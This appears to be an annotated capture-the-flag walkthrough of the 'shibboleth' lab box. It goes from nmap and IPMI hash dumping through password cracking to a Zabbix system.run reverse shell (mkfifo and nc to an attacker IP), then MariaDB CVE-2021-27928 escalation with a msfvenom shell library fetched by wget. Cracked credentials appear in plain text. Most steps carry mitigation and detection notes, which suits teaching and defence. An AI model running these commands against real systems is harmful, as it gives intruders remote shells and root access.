# Recon against the lab target: two TCP passes over all ports with service,
# script and OS detection, then a UDP pass over all ports.
# NOTE(review): the first two runs share the -oA basename "shibboleth", so the
# second run overwrites the first run's output files; use distinct basenames
# if both result sets are meant to be kept.
# NOTE(review): --min-rate=10000 trades accuracy for speed and is very noisy;
# on a monitored network a burst like this is easy to alert on at the IDS or
# firewall.
nmap -A -p- -oA shibboleth 10.129.188.117 --min-rate=10000 --script=vuln --script-timeout=15 -v
# -A on the previous line already enables version and OS detection; this run
# repeats them without the rate override.
nmap -sC -sV -O -p- -oA shibboleth 10.129.188.117
# UDP scan, written to its own basename. Presumably this is what surfaced the
# IPMI service used later in these notes (IPMI-over-LAN normally listens on
# UDP 623) - the scan results themselves are not shown here.
nmap -sU -O -p- -oA shibboleth-udp 10.129.188.117
# Web enumeration: a nikto scan of the service on port 8500, then virtual-host
# discovery against shibboleth.htb with a SecLists wordlist (-r makes gobuster
# follow redirects).
# Presumably the monitor.shibboleth.htb name used below came from this vhost
# run; the output is not shown. From the defender's side, this appears in the
# web server log as a large number of requests that differ only in the Host
# header, and administrative interfaces should not be reachable just by
# guessing a hostname.
nikto -h 10.129.188.117:8500
gobuster vhost -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt" -u "shibboleth.htb" -r
# The three lines after "msfconsole" are typed at the Metasploit prompt, not
# in the shell.
# ipmi_dumphashes relies on how IPMI 2.0 RAKP authentication works: the BMC
# returns a salted HMAC-SHA1 derived from the account password before the
# client has proven anything, so the value can be attacked offline. This is a
# property of the protocol rather than a patchable bug. Mitigations: keep
# IPMI-over-LAN on an isolated management network, disable it where unused,
# and give BMC accounts long random passwords that are used nowhere else.
msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts monitor.shibboleth.htb
run
# Module output for the Administrator account. Presumably this line was saved
# as hash.txt for the next step; the save is not shown.
Administrator:68f06f1e82010000b5ae67010aa2771364c8e73cd9baefa356ab685edbaf53a462ad2febc0822661a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e2c24922308e07c7fccde5dc8820b124b70fac61
# hashcat mode 7300 is IPMI2 RAKP HMAC-SHA1; -a 0 is a straight wordlist run.
# -o writes recovered passwords to a file named "hash", --potfile-disable
# keeps the result out of the potfile, -D 1 selects CPU devices.
# NOTE(review): --force suppresses hashcat's own warnings and can give
# unreliable results; drop it unless the run refuses to start without it.
# A password that falls to a stock wordlist is the actual finding here.
hashcat -m 7300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o hash --potfile-disable -D 1 --force
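Nos dirigimos a http://monitor.shibboleth.htb/ y usamos las credenciales Administrator : ilovepumkinpie1 (la contraseña obtenida al romper el hash IPMI con hashcat). Es decir, la contraseña del BMC está reutilizada en la interfaz web de Zabbix.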
# Zabbix web UI step: under Configuration -> Items an item is defined whose
# key is the system.run[...] line below. That line goes into the item
# definition; it is not typed into a shell.
# system.run makes the agent execute the given command, so any account that
# can edit items effectively has shell access to the monitored host as the
# agent's user. Mitigations: deny the key on the agent (DenyKey/AllowKey in
# current agents, EnableRemoteCommands=0 on older ones), protect Zabbix admin
# accounts like privileged OS accounts, and restrict outbound connections
# from monitoring hosts.
# Detection: the Zabbix agent or server process spawning /bin/sh or nc, a
# FIFO created under /tmp, and an outbound TCP session from the host.
Configuration-> Items
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.65 443 >/tmp/f &,nowait]
# Listener on the tester's own machine; it has to be running before the item
# is tested in the UI.
nc -lvnp 443
Le damos clic a Test y después a Get value and test.
# Commands run inside the shell obtained on the target.
# pty.spawn attaches a pseudo-terminal to the session; su typically refuses to
# prompt for a password without one.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# List local accounts; ipmi-svc is the one switched to next.
cat /etc/passwd
# NOTE(review): the line after "su ipmi-svc" is the password typed at su's
# prompt. It is the same value recovered from the IPMI hash and used for the
# Zabbix login, so one weak credential is shared by the BMC, the web
# application and a local account. Unique passwords per service would have
# stopped the chain at the first step.
su ipmi-svc
ilovepumkinpie1
# zabbix_server.conf keeps the database connection settings (the DB*
# parameters, including DBPassword) in cleartext. Presumably this is where the
# database credentials used later were read from; the output is not shown.
# The file should be readable only by the account the Zabbix server runs as.
cat /etc/zabbix/zabbix_server.conf | grep DB
# Reference repository for CVE-2021-27928. The issue is in MariaDB: a database
# account with the SUPER privilege can change wsrep_provider at runtime, and
# the server then loads the named shared library, so code runs as whatever OS
# account mysqld runs under.
# Mitigations: upgrade MariaDB to a release that fixes this CVE, do not grant
# SUPER to application accounts such as the Zabbix one, and do not run the
# database server as root.
# Detection: SET GLOBAL wsrep_provider in the audit or general log, and
# mysqld loading a library from a world-writable directory such as /tmp.
https://github.com/Al1ex/CVE-2021-27928
# Built on the tester's machine; LHOST is left as a placeholder in these notes.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f elf-so -o shell.so
# Listener and a temporary web server, both on the tester's machine.
nc -lvnp 4444
python3 -m http.server 80
# Run on the target. Presumably from /tmp, given the path in the SET GLOBAL
# statement below; the working directory is not shown.
wget http://10.10.x.x/shell.so
# NOTE(review): a password passed with -p on the command line is visible in
# the process list and ends up in shell history; prompting for it (bare -p)
# or using a protected option file avoids that.
mysql -h localhost -D zabbix -u zabbix -p'bloooarskybluh'
# Typed at the mysql prompt, not in the shell.
SET GLOBAL wsrep_provider="/tmp/shell.so";